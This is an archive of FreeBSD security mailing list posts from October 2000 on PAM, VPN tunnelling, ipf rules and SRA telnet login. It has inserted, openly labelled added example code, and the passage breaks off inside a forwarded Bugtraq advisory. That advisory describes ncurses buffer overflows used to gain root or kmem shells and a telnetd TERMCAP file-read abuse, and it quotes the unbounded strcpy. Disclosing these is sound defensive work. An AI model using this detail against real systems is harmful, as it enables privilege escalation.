> authentication was not available, or I can't find it. I tried to
> compile it from the crypto sources but got some errors when generating
> Makefiles. I could compile and install kerberos5 from the MIT.EDU
> sources, but find this unreasonable.

Heimdal is still considered to be experimental code, and in particular the PAM modules for using it are not yet working. Talk to Mark Murray if you wish to help fix this.

Kris

From owner-freebsd-security Mon Oct 9 16:16:26 2000
To: John F Cuzzola
Cc: freebsd-security@freebsd.org, brian@Awfulhak.org
Subject: Re: FreeBSD tun device
Date: Tue, 10 Oct 2000 00:15:19 +0100
From: Brian Somers

> Hello everyone,
> I'm setting up VPNs using the pipsecd port. I know I probably should be
> using KAME/racoon, but pipsecd is easy to set up and the same software
> works with Linux boxes, again making things easier. My question is: since
> pipsecd requires the tun device, is there a limit to the number of tunnel
> devices FreeBSD will handle? I recall one day someone having a problem
> with more than 9 tunnel devices and I thought I would ask.

I've had ppp running in multilink mode with 200 links being established simultaneously (creating 200 server processes, each with their own tun device 'till they figure out what's going on). Hopefully, that number can now be increased to virtually any number (since tonight's fd_set fix).

So in short, no.

> Thank-you,
>
> John C.

-- 
Brian

      Don't _EVER_ lose your sense of humour !
From owner-freebsd-security Mon Oct 9 18:19:51 2000
From: Mike Thompson
Date: Mon, 09 Oct 2000 18:16:10 -0700
To: freebsd-security@freebsd.org
Subject: Re: Encrypted IP tunneling solution

Unfortunately, the work involved on the Windows side is not nearly as easy as on the FreeBSD side. It would most likely mean creating a virtual NDIS MAC-layer VxD that essentially serves the same function that /dev/tunXX does on FreeBSD, and then writing a Windows userland application that would tie the virtual NDIS driver to an encrypted SSH connection. Not impossible, but not trivial either. I have come across a Windows version of a BPF work-alike driver (it is even under a Berkeley style license) that would help in implementing such a solution.
Mike

At 10:22 AM 10/9/00 -0600, you wrote:
>At 11:56 PM 10/8/2000, Mike Thompson wrote:
>
>>BTW, my ultimate goal behind this little application is to get it working
>>with Windows clients running SSH protocols where it can serve as a very
>>simple, but secure VPN solution.
>
>This would be the real value. It would be VERY useful to tunnel Windows
>clients with minimal effort. It'd be even nicer if it were stand-alone;
>that is, if it did not require a separate SSH implementation to be
>installed on the Windows machine. Many of the users who one wants to
>tunnel into a LAN remotely do not have shell accounts, and giving them
>such accounts can compromise security and/or be confusing to them. Using
>SSH 2 (which doesn't require a shell account for port redirection) would
>be a good way to do this.
>
>--Brett Glass

From owner-freebsd-security Mon Oct 9 19:16:01 2000
From: Gerhard Sittig
Date: Mon, 9 Oct 2000 21:42:25 +0200
To: "freebsd-security@FreeBSD.ORG"
Subject: Re: Default Deny
Organization: System Defenestrators Inc.

On Tue, Oct 10, 2000 at 02:17 +0900, horio shoichi wrote:
> Gerhard Sittig wrote:
> >
> > > > I use this to reload my settings after changes
> > > >
> > > > #!/bin/sh
> > > > ipf -D
> > > > ipf -Fa -f /etc/ipf.conf -E
> > > > ipnat -CF -f /etc/ipnat.conf
> >
> > I would prefer something like
> >
> > ipf -I -Fa -f /etc/ipf.conf -v
> > ( ipf -s; sleep 60; ipf -s; ) &
> > # heavy testing until the prompt returns
> > ipf -s # only when you're happy with what the test showed
> >
>
> Here is my preference.
>
> ipf -IFa -If ./ipf.rules >errors 2>&1
> cat errors
> test ! -s errors && { rm errors ; ipf -s ; }

This will only catch syntax errors and doesn't save you from wrongly implemented rules or faults in your mind due to lack of coffee or sleep. That's why I implement a testing window with the above sequence and an automatic fallback to a known-to-work state, from where you can decide to activate the previously tested set or to keep on editing it. And it wasn't my own idea to do it that way, but I learned it from some ipf doc. But once you've created a rule set to lock yourself out, you're very glad the situation will cure itself within a few seconds! Especially when you're not sitting in front of the machine.

virtually yours   82D1 9B9C 01DC 4FB4 D7B4  61BE 3F49 4F77 72DE DA76
Gerhard Sittig   true | mail -s "get gpg key" Gerhard.Sittig@gmx.net
-- 
     If you don't understand or are scared by any of the above
             ask your parents or an adult to help you.
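The staged activation discussed in this thread (load the candidate rules into the inactive set, swap them in, fall back automatically unless the admin confirms in time), written out as an added example that is not code from any of the posters. The load and swap commands are passed in as strings so the script can be exercised with stand-ins; on an ipfilter host they would be the "ipf -I -Fa -f ..." and "ipf -s" commands quoted above, and the commit/fallback decision is made atomic so the watchdog and the admin can never both act.

```sh
#!/bin/sh
# Added example, not code from the thread. Models the "load into the inactive
# set, swap, background fallback" sequence with two functions. On a real
# ipfilter host LOADCMD would be something like "ipf -I -Fa -f /etc/ipf.conf"
# and SWAPCMD "ipf -s" (ipf -s toggles the active and inactive rule sets, so
# running it a second time is the fallback).

# staged_activate STATEDIR LOADCMD SWAPCMD WINDOW
# Loads the candidate rules, swaps them in and starts a watchdog that swaps
# back after WINDOW seconds unless staged_commit ran first. As with the
# "test ! -s errors" check above, any output from the load step counts as a
# failure and nothing is swapped.
staged_activate() {
    state=$1; load=$2; swap=$3; window=$4
    mkdir -p "$state" || return 1
    rm -rf "$state/decided"
    if ! eval "$load" >"$state/load.out" 2>&1 || [ -s "$state/load.out" ]; then
        echo "rule load failed or printed diagnostics; not activating:" >&2
        cat "$state/load.out" >&2
        return 1
    fi
    eval "$swap" || return 1
    # mkdir is atomic: exactly one of the watchdog and staged_commit creates
    # "$state/decided", and that one decides whether the rules stay or revert.
    (
        sleep "$window"
        if mkdir "$state/decided" 2>/dev/null; then
            echo "test window expired; falling back to the previous rule set" >&2
            eval "$swap"
        fi
    ) &
    echo $! >"$state/watchdog.pid"
}

# staged_commit STATEDIR
# Keeps the candidate rules active. Fails if the window already expired, in
# which case the previous rules are back and the candidate must be staged
# again after fixing whatever locked you out.
staged_commit() {
    state=$1
    if mkdir "$state/decided" 2>/dev/null; then
        echo "candidate rule set kept"
        return 0
    fi
    echo "too late: the watchdog already reverted to the previous rule set" >&2
    return 1
}

# Usage on a real host (not run here):
#   staged_activate /var/run/ipf-stage "ipf -I -Fa -f /etc/ipf.conf" "ipf -s" 60
#   ... test reachability from outside the box ...
#   staged_commit /var/run/ipf-stage
```

The window should be long enough for a genuine reachability test from another host; a syntax-clean rule set that drops your own SSH session is exactly the case the fallback is for.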
From owner-freebsd-security Mon Oct 9 19:55:59 2000
From: Stanley Hopcroft
Date: Tue, 10 Oct 2000 13:55:03 +1100 (EST)
To: Security@FreeBSD.ORG
Cc: Carl Makin, shaddon@IPAustralia.Gov.AU
Subject: What is this and how do I control it ?

Dear Ladies and Gentlemen,

I am writing to say that when I telnet to a 4.1-RELEASE machine (with librsaINTL and the base crypto distribution installed) from a similar client I see,

Trying 10.0.100.252...
Connected to tsitc.aipo.gov.au.
Escape character is '^]'.
Trying SRA secure login:
User (anwsmh):

What does this mean and how do I manage it ?

This telnet client, ktelnet 0.61, seems to negotiate the telnet authentication and encryption options by itself (!) but the FreeBSD telnet, invoked from an rxvt, does not get this distinctive SRA secure login prompt.

( Telnet to the same server from an rxvt on the same client :-

> telnet tsitc
Trying 10.0.100.252...
Connected to tsitc.aipo.gov.au.
Escape character is '^]'.

FreeBSD/i386 (tsitc.aipo.gov.au) (ttyp5)

login:
)

A trace shows the client asking for Authentication and Encryption telnet options, the server agreeing, and an exchange of Auth strings. The password is not sent in clear text but the subsequent session data is.

What means of authentication do they use ?

This is great, but I would like to know what is happening and how to reliably reproduce it, eg from rxvts on the same client host, from ktelnet 0.61 on another machine.

Thank you.

Yours sincerely,

S Hopcroft
Network Specialist
IP Australia
+61 2 6283 3189
+61 2 6281 1353 FAX

From owner-freebsd-security Mon Oct 9 20:59:26 2000
From: Darren Reed
Date: Tue, 10 Oct 2000 14:58:54 +1100 (Australia/NSW)
To: jslivko@linux-mafia.net (Jonathan M. Slivko)
Cc: craig@allmaui.com (Craig Cowen), dtalk@prairienet.org (David Talkington), freebsd-security@FreeBSD.ORG
Subject: Re: Check Point FW-1

In some mail from Jonathan M. Slivko, sie said:
>
> What about LinuxCare and RedHat Support? Isn't that pretty much the same
> thing as what you're referring to when you say "1-800-helpIseebluescreens"?
> That's essentially the same thing. Isn't it?
I find it strange that Linux companies are peddling support for BSD systems.

Before you know it they'll be offering support contracts for Solaris/Windows too...

Darren

From owner-freebsd-security Mon Oct 9 21:53:17 2000
From: Craig Cowen
Date: Mon, 09 Oct 2000 21:56:31 -0700
To: Darren Reed
Cc: "Jonathan M. Slivko", David Talkington, "freebsd-security@FreeBSD.ORG"
Subject: Re: Check Point FW-1

Everybody wants in on the game!

Darren Reed wrote:
> In some mail from Jonathan M. Slivko, sie said:
> >
> > What about LinuxCare and RedHat Support? Isn't that pretty much the same
> > thing as what you're referring to when you say "1-800-helpIseebluescreens"?
> > That's essentially the same thing. Isn't it?
>
> I find it strange that Linux companies are peddling support for BSD systems.
>
> Before you know it they'll be offering support contracts for Solaris/Windows
> too...
>
> Darren

From owner-freebsd-security Mon Oct 9 22:07:09 2000
From: "David G. Andersen"
Date: Mon, 9 Oct 2000 23:06:52 -0600 (MDT)
To: Stanley.Hopcroft@IPAustralia.Gov.AU (Stanley Hopcroft)
Cc: Security@FreeBSD.ORG, Carl.Makin@IPAustralia.Gov.AU (Carl Makin), shaddon@IPAustralia.Gov.AU
Subject: Re: What is this and how do I control it ?

Lo and behold, Stanley Hopcroft once said:
>
> Trying 10.0.100.252...
> Connected to tsitc.aipo.gov.au.
> Escape character is '^]'.
> Trying SRA secure login:
> User (anwsmh):
>
> What does this mean and how do I manage it ?

It's exactly what it seems - it's a secure login protocol. SRA is a secure RPC authentication mechanism based on Diffie-Hellman. What do you mean by "manage?"

> This telnet client, ktelnet 0.61, seems to negotiate the telnet
> authentication and encryption options by itself (!) but the FreeBSD
> telnet, invoked from an rxvt, does not get this distinctive SRA secure
> login prompt.

telnet -a will enable authentication.
You can accomplish the same thing automatically by putting:

host set autologin on

in your .telnetrc file

> What means of authentication do they use ?

SRA.

> This is great, but I would like to know what is happening and how to
> reliably reproduce it eg from rxvts on the same client host, from
> ktelnet 0.61 on another machine.

Yup. See above.

-Dave
-- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Oct 10 0:58:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.mail.yahoo.com (smtp1.mail.yahoo.com [128.11.69.60]) by hub.freebsd.org (Postfix) with SMTP id B745A37B66C for ; Tue, 10 Oct 2000 00:58:37 -0700 (PDT) Received: from unknown (HELO ori) (209.88.175.222) by smtp.mail.vip.suc.yahoo.com with SMTP; 10 Oct 2000 07:58:35 -0000 X-Apparently-From: Message-ID: <092701c03299$2e617d60$2600a8c0@ori> From: "Richard Jones" To: "FreeBSD-Security" Subject: PAM help needed Date: Tue, 10 Oct 2000 11:05:01 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
Hi

I already sent this mail a week ago, but no one came to my help. Doesn't anyone know these things? - If that is the case then please tell me. Here is the mail again in the hope the FreeBSD's PAM experts among you will lend a hand. thanks.

I'm a newbie to this list so if this question has been asked please refer me to it.
In the last couple of days I've been checking the PAM state in the FreeBSD 4.1 release.

Let's see if I understand exactly how PAM works: According to what was configured to it, PAM authenticates user trying to enter the machine. In order to support the PAM control on user's authentication to the machine, there are 2 groups of applications.

group 1: Those that are responsible for authenticating users (such as: login, sshd, su, and others), are supposed to have a section (probably ifdefed) that uses PAM to authenticate the user instead of the standard way it uses. For instance: login can use something other than the usual unix password to authenticate users.

group 2: Those that are responsible for the actual authentication (such as: simple unix, radius, tacplus, etc.). These applications don't require the libpam module support. The libpam itself looks very good, with a lot of useful modules (unix, radius, tacplus, skey, kerberos, ssh, etc.).

Please correct me if I'm wrong.

After walking through the FreeBSD sources I saw that:
1. none of the first group applications (except: login) has the support for PAM authentication (ifdefed).
2. sshd support for PAM: I saw that there was a discussion in this mailing list about this subject. there was a suggestion to change the makefile to use libcrypt. does it mean the ssh-pam interaction works after this change?

My questions are:
a. Is any of my assumptions/conclusions wrong?
b. Is there any work done on the subject to fix it?
c. How stable is PAM on FreeBSD?
d. Any known problems that you know from your experience?
e. Any helpful suggestions?
f. I'm especially interested in PAM for using for group 1 (login and SSH) and for group 2 (radius, tacplus, unix, ssh). Does anyone have any experience with using them through PAM?

sorry for this long mail (I'll keep track of the mailing list from now on so this is a one timer).

thanks in advance for all your help
RJ.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Oct 10 1:48:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id 72FDA37B503 for ; Tue, 10 Oct 2000 01:48:20 -0700 (PDT) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id PAA40674; Tue, 10 Oct 2000 15:47:38 +0700 (NSS) (envelope-from fjoe@iclub.nsu.ru) Date: Tue, 10 Oct 2000 15:47:37 +0700 (NSS) From: Max Khon To: Richard Jones Cc: FreeBSD-Security Subject: Re: PAM help needed In-Reply-To: <092701c03299$2e617d60$2600a8c0@ori> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
hi, there!

On Tue, 10 Oct 2000, Richard Jones wrote:

> Let's see if I understand exactly how PAM works:
> According to what was configured to it, PAM authenticates user trying
> to enter the machine.
> In order to support the PAM control on user's authentication to the
> machine, there are 2 groups of applications.
> group 1: Those that are responsible for authenticating users (such
> as: login, sshd, su, and others), are supposed to have a section
> (probably ifdefed) that uses PAM to authenticate the user instead of the
> standard way it uses. For instance: login can use something other then
> the usual unix password to authenticate users.
>
> group 2: Those that are responsible for the actual authentication (such
> as: simple unix, radius, tacplus, etc.). This application don't require
> the libpam module support. The libpam itself looks very good, with a lot
> of useful modules (unix, radius, tacplus, skey, kerberos, ssh, etc.).
actually there are applications that can authenticate via PAM (group 1) using libpam. The method of authentication is controlled via /etc/pam.conf. libpam reads this file and loads appropriate PAM modules that do authentication. Each PAM module does authentication in its own way. It is possible, for example, to use smb server, or to use RADIUS server for this.

> After walking through the FreeBSD sources I saw that:
> 1. none of the first group applications (except: login) has the support
> for PAM authentication (ifdefed).

login is built with PAM by default. ftpd also has PAM support

> My questions are:
> a. Is any of my assumptions/conclusions wrong?
> b. Is there any work done on the subject to fix it?
> c. How stable is PAM on FreeBSD?
> d. Any known problems that you know from your experience?

I do not know of any problems with PAM under FreeBSD. Seems that FreeBSD PAM library is taken without any significant modifications from Linux PAM 0.65 distribution. PAM modules were written from scratch by John Polstra. I think you can ask Mark Murray about PAM support in FreeBSD.
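Added example, not part of Max's reply and not FreeBSD's libpam: a small C parser for the single-file /etc/pam.conf format he describes ("service type control module-path [args]", one stack per service), run over a constructed configuration in the FreeBSD 4.x layout. It reports which of the four module types (auth, account, session, password) each service's stack actually defines, which is the check to make before pointing su or passwd at PAM. The service names and module lines in SAMPLE_PAM_CONF are assumptions for this example, not a copy of the shipped file.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* One bit per module type, so a service's whole stack fits in an int. */
enum { T_AUTH = 1, T_ACCOUNT = 2, T_SESSION = 4, T_PASSWORD = 8 };

struct pam_entry {
    char service[32];
    char type[16];
    char control[16];
    char module[64];
};

/* Parse one pam.conf line: "service type control module-path [args]".
 * Returns 1 for an entry, 0 for a blank or comment line, -1 if malformed. */
int parse_pam_line(const char *line, struct pam_entry *e)
{
    while (isspace((unsigned char)*line))
        line++;
    if (*line == '\0' || *line == '#')
        return 0;
    if (sscanf(line, "%31s %15s %15s %63s",
               e->service, e->type, e->control, e->module) != 4)
        return -1;
    return 1;
}

static int type_bit(const char *type)
{
    if (strcmp(type, "auth") == 0)     return T_AUTH;
    if (strcmp(type, "account") == 0)  return T_ACCOUNT;
    if (strcmp(type, "session") == 0)  return T_SESSION;
    if (strcmp(type, "password") == 0) return T_PASSWORD;
    return 0;
}

/* OR together the module types defined for `service` in a whole pam.conf
 * text.  Any malformed line or unknown type returns -1: a silently skipped
 * line is exactly how a "required" module goes missing from a stack. */
int service_types(const char *conf, const char *service)
{
    int bits = 0;
    const char *p = conf;

    while (*p != '\0') {
        char line[256];
        struct pam_entry e;
        const char *nl = strchr(p, '\n');
        size_t n = nl ? (size_t)(nl - p) : strlen(p);
        int r;

        if (n >= sizeof line)
            return -1;
        memcpy(line, p, n);
        line[n] = '\0';

        r = parse_pam_line(line, &e);
        if (r < 0)
            return -1;
        if (r == 1 && strcmp(e.service, service) == 0) {
            int b = type_bit(e.type);
            if (b == 0)
                return -1;
            bits |= b;
        }
        p = nl ? nl + 1 : p + n;
    }
    return bits;
}

/* Constructed pam.conf in the FreeBSD 4.x single-file layout (an assumption
 * made for this example, not the file shipped in the release). */
const char *SAMPLE_PAM_CONF =
    "# service  type      control     module-path      args\n"
    "login      auth      sufficient  pam_skey.so\n"
    "login      auth      required    pam_unix.so      try_first_pass\n"
    "login      account   required    pam_unix.so\n"
    "login      session   required    pam_permit.so\n"
    "login      password  required    pam_permit.so\n"
    "ftpd       auth      required    pam_unix.so\n"
    "ftpd       account   required    pam_unix.so\n"
    "sshd       auth      required    pam_radius.so\n";

static void report(const char *service)
{
    int t = service_types(SAMPLE_PAM_CONF, service);
    if (t < 0) {
        printf("%-6s malformed stack\n", service);
        return;
    }
    printf("%-6s auth=%d account=%d session=%d password=%d\n", service,
           !!(t & T_AUTH), !!(t & T_ACCOUNT), !!(t & T_SESSION), !!(t & T_PASSWORD));
}

int main(void)
{
    report("login");
    report("ftpd");
    report("sshd");
    report("su");      /* nothing configured for su in this sample */
    return 0;
}
```

Only login carries all four types in the sample; ftpd has no session or password stack and sshd only auth, which matches the thread's point that a program being "built with PAM" says nothing about which module types are wired up behind it.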
/fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 2:36: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from hosting.doublesquare.com (hosting.doublesquare.com [212.119.162.4]) by hub.freebsd.org (Postfix) with ESMTP id 719E137B503 for ; Tue, 10 Oct 2000 02:35:57 -0700 (PDT) Received: from eltex.ru (eltex-gw2.nw.ru [195.19.203.86] (may be forged)) by hosting.doublesquare.com (8.9.3/8.9.3) with ESMTP id NAA24490 for ; Tue, 10 Oct 2000 13:30:21 +0400 (MSD) From: ark@eltex.ru Received: from yaksha.eltex.ru (root@yaksha.eltex.ru [195.19.198.2]) by eltex.ru (8.9.3/8.9.3) with SMTP id SAA42049; Mon, 9 Oct 2000 18:50:46 +0400 (MSD) Received: by yaksha.eltex.ru (ssmtp TIS-0.6alpha, 19 Jan 2000); Mon, 9 Oct 2000 18:47:35 +0400 Received: from undisclosed-intranet-sender id xma023656; Mon, 9 Oct 00 18:47:15 +0400 Date: Mon, 9 Oct 2000 18:48:12 +0400 Message-Id: <200010091448.SAA28341@paranoid.alpha.int> In-Reply-To: from "David Talkington " Organization: "Klingon Imperial Intelligence Service" Subject: Re: Check Point FW-1 To: dtalk@prairienet.org Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- nuqneH, Outsource it all, then. David Talkington said : > > >What is really the difference is being able to dial 1-800-FIREWALL and > >have someone help you out, etc. > >Darren > > Yeah, I wonder if my (item b) instinct was unfair. David Pick > mentioned herein the possibility that the company might not even WANT > the expertise to be in-house, and while his scenario was pretty ugly, > it suggests a more benign one ... if the company goes with an > open-source solution, and you're the only one on staff who knows how > to use it, they are then dependent on your talent. Great for you, but > bad for them, if turnover is high. 
At least a purchased solution > ensures some kind of support no matter who leaves the company. > > Your thoughts on this? Seems like a valid concern, and not one that I > had considered. (Perhaps I'm naive ... ) _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.1i iQCVAwUBOeHaq6H/mIJW9LeBAQEb9gQAim4q5GrP90eT7p9wacSS986UbBimctRK uIiiWBLwQF1ZqYyCPWlwsIaSlEvwjPr7cb5+EaT+CNabVHa1S77vdI1g/tCRZcIZ Xn+C2O+6uGQFwTqTfza5NyTD73X/HlNAQ6RczvGJJN0dIyNBonfIIdBS25lCglro 42zMWel+aEg= =38ic -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 4:23:32 2000 Delivered-To: freebsd-security@freebsd.org Received: from postman.lipetsk.ru (postman.lipetsk.ru [195.34.224.68]) by hub.freebsd.org (Postfix) with ESMTP id 40C5F37B66C for ; Tue, 10 Oct 2000 04:23:25 -0700 (PDT) Received: from lstu by relay.lipetsk.ru with UUCP id ; Tue, 10 Oct 2000 15:23:05 +0400 Received: from corsair.stu.lipetsk.ru (root@corsair.lstu [192.168.15.51]) by maverick.stu.int (8.9.3/8.8.5) with ESMTP id PAA54978 for Tue, 10 Oct 2000 15:14:25 +0400 (MSD) Received: from skynick (root@loopback [127.0.0.1]) by corsair.stu.lipetsk.ru (8.9.3/8.9.2) with SMTP id PAA94948 for ; Tue, 10 Oct 2000 15:14:25 +0400 (MSD) (envelope-from skynick@stu.lipetsk.su) Message-ID: <00bb01c032ab$3ee9ccc0$131fa8c0@skynick> From: "Nick A. 
Leuta" To: "FreeBSD-Security" References: Subject: Re: PAM help needed Date: Tue, 10 Oct 2000 15:13:32 +0400 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
Hi!

Max Khon wrote:
> On Tue, 10 Oct 2000, Richard Jones wrote:
> > After walking through the FreeBSD sources I saw that:
> > 1. none of the first group applications (except: login) has the support
> > for PAM authentication (ifdefed).
>
> login is built with PAM by default. ftpd also has PAM support

The same is needed in sshd, su, lock etc...

> > My questions are:
> > a. Is any of my assumptions/conclusions wrong?
> > b. Is there any work done on the subject to fix it?
> > c. How stable is PAM on FreeBSD?
> > d. Any known problems that you know from your experience?
> I do not know of any problems with PAM under FreeBSD.
> Seems that FreeBSD PAM library is taken without any
> significant modifications from Linux PAM 0.65 distribution.

Yes, it's true. But unlike FreeBSD, under Linux RH 6.x distribution all applications like login, passwd, su, vlock, xdm, xlock, xscreensaver (in /etc/pam.d also mentioned shutdown, xsaver...) use pam.

...Do FreeBSD's pam_* modules realize all known (auth, account, session, password) "module-types"?
--- SkyNick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 5:16: 0 2000 Delivered-To: freebsd-security@freebsd.org Received: from rnocserv.urc.ac.ru (rnocserv.urc.ac.ru [193.233.85.2]) by hub.freebsd.org (Postfix) with ESMTP id 2111837B66C; Tue, 10 Oct 2000 05:15:23 -0700 (PDT) Received: from urc.ac.ru (belle.rnoc.urc.ac.ru [193.233.85.10]) by rnocserv.urc.ac.ru (8.11.0/8.11.0) with ESMTP id e9ACEv519059; Tue, 10 Oct 2000 18:14:59 +0600 (YEKST) (envelope-from anton@urc.ac.ru) Message-ID: <39E30840.53E8D667@urc.ac.ru> Date: Tue, 10 Oct 2000 18:14:56 +0600 From: Anton Voronin Organization: URC FREEnet X-Mailer: Mozilla 4.74 [ru ] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: stable@freebsd.org Cc: security@freebsd.org Subject: rc & diskless bug Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello! /etc/rc checks $1 against "autoboot" after it runs /etc/rc.diskless1. But as the latter uses "set" command, it clears the command line, and so /etc/rc fails to check for autoboot mode, so it doesn't run fsck, and so fails to mount local filesystems (for example, I have /tmp mounted locally). 
Regards, Anton -- Anton Voronin Ural Regional Center of FREEnet, Southern Ural State University, Chelyabinsk, Russia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 10 7: 3:52 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id AEEA637B503 for ; Tue, 10 Oct 2000 07:03:47 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA14295 for ; Tue, 10 Oct 2000 07:03:39 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda14291; Tue Oct 10 07:03:32 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.0/8.9.1) id e9AE3W405628 for ; Tue, 10 Oct 2000 07:03:32 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdwT5625; Tue Oct 10 07:03:19 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e9AE3Ir08713 for ; Tue, 10 Oct 2000 07:03:18 -0700 (PDT) Message-Id: <200010101403.e9AE3Ir08713@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdAT8692; Tue Oct 10 07:02:31 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: freebsd-security@freebsd.org Subject: ncurses buffer overflows (fwd) Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Mime-Version: 1.0 Content-Transfer-Encoding: quoted-printable Date: Tue, 10 Oct 2000 07:02:30 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org For those of you who don't subscribe to BUGTRAQ, here's a heads up. 
Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC

------- Forwarded Message
[headers deleted]
Message-ID: Date: Mon, 9 Oct 2000 22:42:49 +0300 Reply-To: Jouko Pynnönen Sender: Bugtraq List From: Jouko Pynnönen Subject: ncurses buffer overflows To: BUGTRAQ@SECURITYFOCUS.COM X-MIME-Autoconverted: from QUOTED-PRINTABLE to 8bit by passer.osg.gov.bc.ca id e99LWVm00922 Resent-To: cy@passer.osg.gov.bc.ca Resent-Date: Mon, 09 Oct 2000 14:32:31 -0700 Resent-From: Cy Schubert X-MIME-Autoconverted: from 8bit to quoted-printable by passer.osg.gov.bc.ca id e99LXWh00934 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by cwsys.cwsent.com id e99LXpR01317

OVERVIEW

The CRT screen handling library ncurses contains buffer overflows, making programs using it vulnerable. If the programs are setuid or setgid, a local user may elevate their privilege. The problem exists in ncurses versions 4.2 and 5.0, probably earlier, and libocurses. The overflows can be exploited if the library implementation supports loading of user defined terminfo files from ~/.terminfo.

The problem has been tested and found on

* SuSE Linux 6.4, Red Hat Linux 6.1. A setuid program using ncurses ("cda" in the xmcd package) was successfully exploited to spawn a root shell.

* FreeBSD, the program /usr/bin/systat is setgid and uses libncurses. An exploit was made which gives a shell with egid=kmem. The kmem group has read access to /dev/kmem and memory of all processes via /proc//mem, and could be used to read e.g. crypted or cleartext passwords, authorization keys, or any other info that might be in programs' memory space.

* OpenBSD, having /usr/bin/systat setgid kmem too. No test exploit was made, but the program segfaults when given an "evil" terminfo file. Making a similar exploit is probably possible.
This applies to other BSD systems as well, but hasn't been tested or confirmed.

All programs using ncurses aren't necessarily vulnerable, e.g. "screen" is setuid root on some systems and uses ncurses, but it doesn't seem to use the vulnerable functions at least directly (investigated on Red Hat Linux, other systems may vary).

When using telnet to connect to a remote system, telnetd on some platforms doesn't ignore TERMINFO_DIRS or TERMCAP environment variables (e.g. OpenBSD). This means the problem could be remotely exploitable under some conditions on some platforms. This hasn't been confirmed with an exploit, however by setting TERMCAP the OpenBSD telnetd can be made to read any file as root. If the file is something like /dev/zero, the telnetd process reads it infinitely until the system runs out of memory.

BUG DETAILS

The file ncurses/tty/lib_mvcur.c contains functions for moving around the cursor. Some of the functions contain calls to strcpy() without bound checking. The target of the strcpy's is a local fixed size buffer in onscreen_mvcur():

static inline int
onscreen_mvcur(int yold,int xold,int ynew,int xnew, bool ovw)
/* onscreen move from (yold, xold) to (ynew, xnew) */
{
    char use[OPT_SIZE], *sp;
...

a few lines later:

    sp = tparm(SP->_address_cursor, ynew, xnew);
    if (sp)
    {
        tactic = 0;
        (void) strcpy(use, sp);

